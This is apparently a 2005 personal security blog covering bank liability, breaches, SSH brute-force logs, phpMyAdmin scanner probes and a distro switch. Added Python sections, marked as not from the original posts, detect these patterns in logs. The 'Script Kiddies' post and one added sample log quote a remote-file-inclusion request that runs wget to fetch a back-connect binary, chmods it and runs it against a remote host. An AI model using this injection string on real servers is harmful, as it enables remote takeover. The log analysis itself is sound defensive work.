Wednesday, December 21, 2005

The Bank is Not Your Friend

Digital signatures sound cool -- imagine being able to sign a check using a digital signature to guarantee the check's authenticity and irrevocability. Unfortunately, there's one small difference in how most banks propose to treat digital signatures. Irrevocable means that if anything gets signed with your digital signature, the burden of proof is on you, the consumer, to prove it wasn't you. Currently, when you sign a check, the burden of proof is on the bank: if it's not your signature, you don't pay. It won't be that way with a digital signature.

Banks may say they protect you from fraud, but they really protect themselves. If your identity gets stolen, the burden is on you to prove it's not you who owes all that money. When ATMs were first introduced, banks argued they were infallible and that anyone claiming losses from wrongful ATM withdrawals must be trying to defraud the bank. That lasted until the banks went after criminals who stole from the "infallible" ATMs.

As banks and consumers go further into online transactions in the digital age, be wary. The banks are placing more and more liabilities on the consumer. When you engage in online banking, the terms of service you click "yes" to agree to generally state that all bank records are definitive. If the bank says you withdrew it, you withdrew it and that's that.

A couple of years ago, I sent my online credit card payment to the cable company by mistake. I tried in vain to get a refund and settled for having a credit on my account that would cover a year of cable. At the end of that year, the fraud investigator decided that she couldn't find the money in the cable company's accounting system, and removed the credit from my account. After I found my bank statement from a year earlier, faxed it to her, and got my bank to call, we cleared things up, but the burden of proof was on me. And my bank wasn't that helpful, either, insisting that I find the bank statements from a year ago or pay for a copy from them.

What was shocking was that a year after crediting the money into my account, the cable company couldn't track its own cash, and assumed it must have been some fraud. The burden of proof was on me, and I really didn't enjoy tracking down a bank statement from the year before.

Tuesday, December 20, 2005

Do As I Say, Not As I Do?

It's easy to miss news buried in the business section given what's going on in the front section, but this is pretty harsh. Guidance Software, which makes audit software, was itself hacked. Just about everyone who is anyone in computer forensic investigation uses this software. The hacker(s?) got names and card numbers, including the CVV codes on the back, which aren't even supposed to be stored, according to Visa and MasterCard guidelines. In case you're wondering, Visa and MC spell out exactly what measures merchants must take to protect this data, and it appears that Guidance violated several of them, resulting in a massive catch for the hackers.

You'd think you'd be safe, purchasing software with a credit card from a premier security software company. Following these guidelines is more important than ever, since hackers are no longer interested in mere website defacements. They're going after the money.


Visit a bank. Note the security measures. They don't leave money lying around. Even if they did, it wouldn't be legal to steal it, but you also wouldn't keep your money there.

Saturday, December 10, 2005

A Couple of Schneier Entries Everyone Should Read

Security guru Bruce Schneier has a couple of recent news items on his blog that everyone should read. First is the tale of backup tapes containing millions of banking records that were "lost." It turns out they weren't lost at all. The package control system was hacked to make the tape delivery a low-security item not requiring multiple signatures. After the package was stolen, the hackers restored the original security settings on the package. For companies that use paid off-site storage contractors, this is very scary.


Dr. Schneier's second entry is about a story in Nature, a scholarly scientific journal to which I subscribe and have used for writing reviews for my classes. Apparently, not everything in Nature is peer-reviewed, and a paper on a new type of encryption turned out to be almost complete bunk. Of course, you can't read the original piece in Nature without subscribing (I got the student rate), but Schneier has an excellent critique.

Friday, December 9, 2005

What They Do at Other IST Schools

OK, picking out hacking attempts from logfiles is getting tired, so I promise, just one more. Apparently, at other IST schools, attempting to log on to other people's servers is what they teach. I see entries like these regularly in my emails from Logwatch. What makes this one different is that it comes from an IST school like mine.


This brings up the (tired old) subject of university networks. They need to remain open and useful to students and professors, but they need to be protected from abuse and from being used to abuse others. Preventing attacks like these from a campus would be hard. You could block port 22 outbound, but that would cut off a lot of legitimate activity. You could have all students sign an acceptable use policy, which might help you enforce rules against someone once you catch them. You could monitor network traffic for patterns like these, but that would mean monitoring a lot of network traffic at great expense. Universities charge enough without having to purchase a lot of monitoring equipment and software and hire staff to watch their students, but this is what the Federal government wants them to do. Given how many attacks originate at universities, it's easy to understand why. The Morris worm nearly took down the Internet from a university almost twenty years ago.


The more things change...

Logwatch entries:


sshd:
    Authentication Failures:
       unknown (ist.pct.edu): 101 Time(s)
       apache (ist.pct.edu): 1 Time(s)
       bin (ist.pct.edu): 1 Time(s)
       mail (ist.pct.edu): 1 Time(s)
       mysql (ist.pct.edu): 1 Time(s)
       nobody (ist.pct.edu): 1 Time(s)
       root (ist.pct.edu): 1 Time(s)
       xfs (ist.pct.edu): 1 Time(s)
    Invalid Users:
       Unknown Account: 101 Time(s)

Failed logins from these:
    admin/password from ::ffff:72.20.218.49: 1 Time(s)
    adsl/password from ::ffff:72.20.218.49: 1 Time(s)
    akon/password from ::ffff:72.20.218.49: 1 Time(s)
    chun/password from ::ffff:72.20.218.49: 1 Time(s)
    cisco/password from ::ffff:72.20.218.49: 1 Time(s)
    cyd/password from ::ffff:72.20.218.49: 1 Time(s)
    deamon/password from ::ffff:72.20.218.49: 1 Time(s)
    dsl/password from ::ffff:72.20.218.49: 1 Time(s)
    favorites/password from ::ffff:72.20.218.49: 1 Time(s)
    fuji/password from ::ffff:72.20.218.49: 1 Time(s)
    fujiwara/password from ::ffff:72.20.218.49: 1 Time(s)
    fukumoto/password from ::ffff:72.20.218.49: 1 Time(s)
    genki/password from ::ffff:72.20.218.49: 1 Time(s)
    granlumie/password from ::ffff:72.20.218.49: 1 Time(s)
    guest/password from ::ffff:72.20.218.49: 1 Time(s)
    hagiwara/password from ::ffff:72.20.218.49: 1 Time(s)
    hakko/password from ::ffff:72.20.218.49: 1 Time(s)
    hayashi/password from ::ffff:72.20.218.49: 2 Time(s)
    hayashy/password from ::ffff:72.20.218.49: 1 Time(s)
    hiramara/password from ::ffff:72.20.218.49: 1 Time(s)
    hiramaru/password from ::ffff:72.20.218.49: 1 Time(s)
    hiroshi/password from ::ffff:72.20.218.49: 1 Time(s)
    history/password from ::ffff:72.20.218.49: 1 Time(s)
    hokko/password from ::ffff:72.20.218.49: 1 Time(s)
    hokoyama/password from ::ffff:72.20.218.49: 1 Time(s)
    horikoshi/password from ::ffff:72.20.218.49: 1 Time(s)
    hotline/password from ::ffff:72.20.218.49: 1 Time(s)
    hotmail/password from ::ffff:72.20.218.49: 1 Time(s)
    ikanri/password from ::ffff:72.20.218.49: 1 Time(s)
    info/password from ::ffff:72.20.218.49: 1 Time(s)
    install/password from ::ffff:72.20.218.49: 1 Time(s)
    internet/password from ::ffff:72.20.218.49: 1 Time(s)
    invite/password from ::ffff:72.20.218.49: 1 Time(s)
    iocha/password from ::ffff:72.20.218.49: 1 Time(s)
    ishihara/password from ::ffff:72.20.218.49: 1 Time(s)
    ito/password from ::ffff:72.20.218.49: 1 Time(s)
    kajipar/password from ::ffff:72.20.218.49: 1 Time(s)
    kakou/password from ::ffff:72.20.218.49: 1 Time(s)
    kamata/password from ::ffff:72.20.218.49: 1 Time(s)
    kamato/password from ::ffff:72.20.218.49: 1 Time(s)
    kato/password from ::ffff:72.20.218.49: 1 Time(s)
    kawakami/password from ::ffff:72.20.218.49: 1 Time(s)
    kay/password from ::ffff:72.20.218.49: 1 Time(s)
    ken/password from ::ffff:72.20.218.49: 1 Time(s)
    kenkou/password from ::ffff:72.20.218.49: 1 Time(s)
    kento/password from ::ffff:72.20.218.49: 1 Time(s)
    kobe/password from ::ffff:72.20.218.49: 1 Time(s)
    kohi/password from ::ffff:72.20.218.49: 1 Time(s)
    kohitujikai/password from ::ffff:72.20.218.49: 1 Time(s)
    kumemura/password from ::ffff:72.20.218.49: 1 Time(s)
    lestat/password from ::ffff:72.20.218.49: 1 Time(s)
    mac/password from ::ffff:72.20.218.49: 1 Time(s)
    masumura/password from ::ffff:72.20.218.49: 1 Time(s)
    matsuo/password from ::ffff:72.20.218.49: 1 Time(s)
    mikata/password from ::ffff:72.20.218.49: 1 Time(s)
    miura/password from ::ffff:72.20.218.49: 1 Time(s)
    motoka/password from ::ffff:72.20.218.49: 1 Time(s)
    motooka/password from ::ffff:72.20.218.49: 1 Time(s)
    nakamoto/password from ::ffff:72.20.218.49: 1 Time(s)
    nakamura/password from ::ffff:72.20.218.49: 1 Time(s)
    nakayama/password from ::ffff:72.20.218.49: 1 Time(s)
    new/password from ::ffff:72.20.218.49: 1 Time(s)
    nuke/password from ::ffff:72.20.218.49: 1 Time(s)
    otashiro/password from ::ffff:72.20.218.49: 1 Time(s)
    play/password from ::ffff:72.20.218.49: 1 Time(s)
    playboy/password from ::ffff:72.20.218.49: 1 Time(s)
    proba/password from ::ffff:72.20.218.49: 1 Time(s)
    prova/password from ::ffff:72.20.218.49: 1 Time(s)
    prueba/password from ::ffff:72.20.218.49: 1 Time(s)
    register/password from ::ffff:72.20.218.49: 1 Time(s)
    robert/password from ::ffff:72.20.218.49: 1 Time(s)
    roberto/password from ::ffff:72.20.218.49: 1 Time(s)
    ryu/password from ::ffff:72.20.218.49: 1 Time(s)
    saito/password from ::ffff:72.20.218.49: 1 Time(s)
    sales/password from ::ffff:72.20.218.49: 2 Time(s)
    search/password from ::ffff:72.20.218.49: 1 Time(s)
    sesso/password from ::ffff:72.20.218.49: 1 Time(s)
    sex/password from ::ffff:72.20.218.49: 1 Time(s)
    shimada/password from ::ffff:72.20.218.49: 1 Time(s)
    shiraki/password from ::ffff:72.20.218.49: 1 Time(s)
    shiraky/password from ::ffff:72.20.218.49: 1 Time(s)
    takato/password from ::ffff:72.20.218.49: 1 Time(s)
    teraji/password from ::ffff:72.20.218.49: 1 Time(s)
    test/password from ::ffff:72.20.218.49: 4 Time(s)
    toi/password from ::ffff:72.20.218.49: 1 Time(s)
    toy/password from ::ffff:72.20.218.49: 1 Time(s)
    transfer/password from ::ffff:72.20.218.49: 1 Time(s)
    trust/password from ::ffff:72.20.218.49: 1 Time(s)
    try/password from ::ffff:72.20.218.49: 1 Time(s)
    tujikai/password from ::ffff:72.20.218.49: 1 Time(s)
    wap/password from ::ffff:72.20.218.49: 1 Time(s)
    wara/password from ::ffff:72.20.218.49: 1 Time(s)
    web/password from ::ffff:72.20.218.49: 1 Time(s)
    www/password from ::ffff:72.20.218.49: 1 Time(s)
    yamanaka/password from ::ffff:72.20.218.49: 1 Time(s)
    yokoya/password from ::ffff:72.20.218.49: 1 Time(s)
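As an added example (not code from the original post), here is a small Python detector for the Logwatch "Failed logins" format above: it groups failures by source address, strips the ::ffff: IPv4-mapped prefix that sshd logs on dual-stack hosts, and flags a source that hits many different usernames, which is the dictionary walk in the listing rather than one user fat-fingering a password. The sample block reuses the source address from the listing, but its counts and the 10.0.0.5 entry are constructed.

```python
import re
from collections import defaultdict

# Constructed sample in the Logwatch "Failed logins" format shown in the post.
# Counts are made up; the single entry from 10.0.0.5 stands for a normal typo.
SAMPLE = """\
Failed logins from these:
    admin/password from ::ffff:72.20.218.49: 1 Time(s)
    test/password from ::ffff:72.20.218.49: 4 Time(s)
    hayashi/password from ::ffff:72.20.218.49: 2 Time(s)
    root/password from ::ffff:72.20.218.49: 1 Time(s)
    bob/password from 10.0.0.5: 1 Time(s)
"""

# One Logwatch line: "<user>/password from <source>: <n> Time(s)"
LINE_RE = re.compile(
    r"^\s*(?P<user>[^/\s]+)/password from (?P<src>\S+?): (?P<n>\d+) Time\(s\)\s*$"
)

def normalize_ip(src):
    """sshd on a dual-stack host logs IPv4 peers as ::ffff:a.b.c.d; strip that."""
    return src[len("::ffff:"):] if src.startswith("::ffff:") else src

def parse_failed_logins(text):
    """Return {ip: {username: failures}} from a Logwatch 'Failed logins' block."""
    per_ip = defaultdict(lambda: defaultdict(int))
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            per_ip[normalize_ip(m["src"])][m["user"]] += int(m["n"])
    return per_ip

def flag_bruteforce(per_ip, min_attempts=5, min_users=3):
    """Flag a source with many failures spread across many usernames, which is
    the dictionary walk in the post; a few failures on one account is a typo."""
    flagged = {}
    for ip, users in per_ip.items():
        attempts = sum(users.values())
        if attempts >= min_attempts and len(users) >= min_users:
            flagged[ip] = {"attempts": attempts, "distinct_users": len(users)}
    return flagged
```

The thresholds are deliberately low so the short sample trips them; on a real Logwatch report the listing above (over a hundred usernames from one address) is flagged by any sane setting.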

Wednesday, November 30, 2005

Script Kiddies attack my Linux/Apache box

I am seeing attacks on popular open-source software that runs on Linux, e.g.:

129.27.140.4 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST
[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://148.81.141.12/cmd.gif?&cmd=cd%20/tmp;wget%20
131.155.98.128/cback;chmod%20744%20cback;./cback%20
194.112.220.37%208080;echo%20YYY;echo| 
HTTP/1.1" 404 293 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"


(I have broken the line up to fit. It's one entry, or request, from my Apache 2.0 log file. It's a Fedora Core 4 install, mostly default.)

These are slightly more complex attacks, and they show the difficulty of tracking down your attacker. The requester, 129.27.140.4, resolves to optikom2.inw.tu-graz.ac.at -- the Graz University of Technology in Austria. But the request pulls a script from lilo.pjwstk.edu.pl, the POLSKO-JAPONSKA WYZSZA SZKOLA TECHNIK KOMPUTEROWYCH in Poland. It fetches more code from pc01.irce.tue.nl, someone's computer in the Netherlands. Finally, it looks like this server gets notified: 194.112.220.37, www.lbsschrems.at, WVNET Information und Kommunikation GmbH, someone's server in Austria. That server is running phpGroupWare, and has probably already been compromised and is now being used to compromise other machines. You could check for bugs in phpGroupWare, but their server's down.

The code here,
http://131.155.98.128/cback, appears to be something in C that requires some include files. The initial script, here:
http://148.81.141.12/cmd.gif is a defacement script. Note that it doesn't open in Netscape -- just IE.

<!-- Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com if you are going to modify the code, please keep the names of its original authors and please get in touch with me... hey folks, seriously, there are a lot of scumbags who just use it; don't be just a sucker of the script, don't be an idiotic lamer, don't be a crappy script kiddie, don't be a jerk, help improve it too!! -->

At least our script writer left us his email address. He just wrote the code, of course; he's not the one trying to use it to deface a site. Right. There were additional lines in my Apache log file that showed attacks against other applications (not installed on my box): WordPress, phpGroupWare, Drupal and AWStats. What weakness do these applications have in common? XML-RPC on PHP.

It looks like Apache needs a tool similar to Windows/IIS's URLScan, which prevents attacks like these from reaching the web server in the first place. These attacks are increasingly common, but there are no newspaper headlines, as there were for attacks that took advantage of Microsoft vulnerabilities. These don't attack a single product, but holes in applications that are built on the ability to run things at the command line from a web request. It makes for great functionality and weak security.

Weak web applications may mean your firewall is really just a router for port 80 traffic.

Tuesday, November 29, 2005

A New Attack

Just when I was running out of memory to run my new photo gallery (Gallery 2),
I checked my log files to see what was causing some issues for me. It
turns out that Gallery2 and SELinux do not get along so well, but if
you edit your policy files, it can be made to work.

The new attack:

195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /admin/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /mysql/main.php HTTP/1.0" 404 291 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /dbadmin/main.php HTTP/1.0" 404 293 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /db/main.php HTTP/1.0" 404 288 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 300 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/pma/main.php HTTP/1.0" 404 295 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/mysql/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /mysql-admin/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpmyadmin2/main.php HTTP/1.0" 404 297 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 302 "-" "pmafind"
195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 302 "-" "pmafind"

Apparently, there's a new tool out that identifies itself as "pmafind" in the
User-Agent field and goes looking for phpMyAdmin installs. I hadn't seen this
one before. I guess enough people have phpMyAdmin installed in some
unprotected directory to make this worthwhile.
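As an added example serving both the Mambo remote-include request in the "Script Kiddies" entry above and the pmafind probes here (not code from the original posts), the Python below parses Apache combined-format lines and applies two checks a defender could run over access_log: a query value that is itself an http:// URL or carries shell commands, which is the remote file inclusion tell, and one source racking up 404s on many distinct paths, which is what a pmafind sweep looks like. The log lines are constructed with RFC 5737 test addresses, not the addresses from the posts.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Apache combined log format (the default access_log on the Fedora box in the post).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (RFC 5737 test addresses, not the IPs from the posts):
# a Mambo remote-include attempt, a pmafind probe burst, and one normal request.
SAMPLE_LOG = """\
192.0.2.7 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://198.51.100.20/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.21/cback;chmod%20744%20cback;./cback HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
203.0.113.9 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"
203.0.113.9 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"
203.0.113.9 - - [28/Nov/2005:20:06:42 -0500] "GET /admin/main.php HTTP/1.0" 404 291 "-" "pmafind"
203.0.113.9 - - [28/Nov/2005:20:06:42 -0500] "GET /mysql/main.php HTTP/1.0" 404 291 "-" "pmafind"
203.0.113.9 - - [28/Nov/2005:20:06:42 -0500] "GET /dbadmin/main.php HTTP/1.0" 404 293 "-" "pmafind"
198.51.100.5 - - [28/Nov/2005:20:07:00 -0500] "GET /gallery2/main.php?g2_itemId=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def parse_log(text):
    """Parse combined-format lines into dicts; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries

# Shell fragments that have no business inside the query string of a content site.
SHELL_RE = re.compile(r"\b(wget|curl|chmod|sh)\b|;|\|")

def is_remote_include(entry):
    """Remote file inclusion tell: a query value that is itself an http(s) URL
    (the post's mosConfig_absolute_path=http://...), or a shell-command tail."""
    query = urlsplit(entry["url"]).query
    for pair in query.split("&"):
        value = unquote(pair.partition("=")[2])
        if re.match(r"https?://", value, re.I) or SHELL_RE.search(value):
            return True
    return False

def find_scanners(entries, min_missed_paths=5):
    """Flag a source that 404s on many distinct paths, the pmafind pattern:
    one IP walking a list of phpMyAdmin locations in a couple of seconds."""
    missed, agents = defaultdict(set), defaultdict(set)
    for e in entries:
        if e["status"] == "404":
            missed[e["ip"]].add(urlsplit(e["url"]).path)
            agents[e["ip"]].add(e["ua"])
    return {ip: {"paths": len(paths), "agents": sorted(agents[ip])}
            for ip, paths in missed.items() if len(paths) >= min_missed_paths}
```

The User-Agent is reported alongside the count because a scanner that announces itself, as pmafind does, is the easy case; the path-count rule still catches one that sends a browser string.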

More attacks to come...


Monday, November 21, 2005

Red Hat vs. Mandrake

I grew tired of updating every package that came with Mandrake. The
most frustrating part was either not finding what I needed to install, or
installing it and then having configure fail to find it.

I re-downloaded Fedora Core 4 in the DVD image, burned it on the Mac.
Macs can open, create and burn ISO images using the standard Disk Tools
utility. I checked the sha1sum on the Linux box that was the FTP
staging area, because OS X doesn't seem to have a sha1sum utility, and
I didn't feel like spending time downloading, configuring and
installing one. CuteFTP balked at downloading a 2.6 GB file, too,
insisting that there wasn't space on my hard disk for it, even though
there was plenty of space. Once again, Linux command line to the rescue.

Red Hat is now installed on my antique Inspiron 7500, and it's not
perfect yet -- I'm still working on the display. But much more software
works without endless download, configure, make, make install cycles....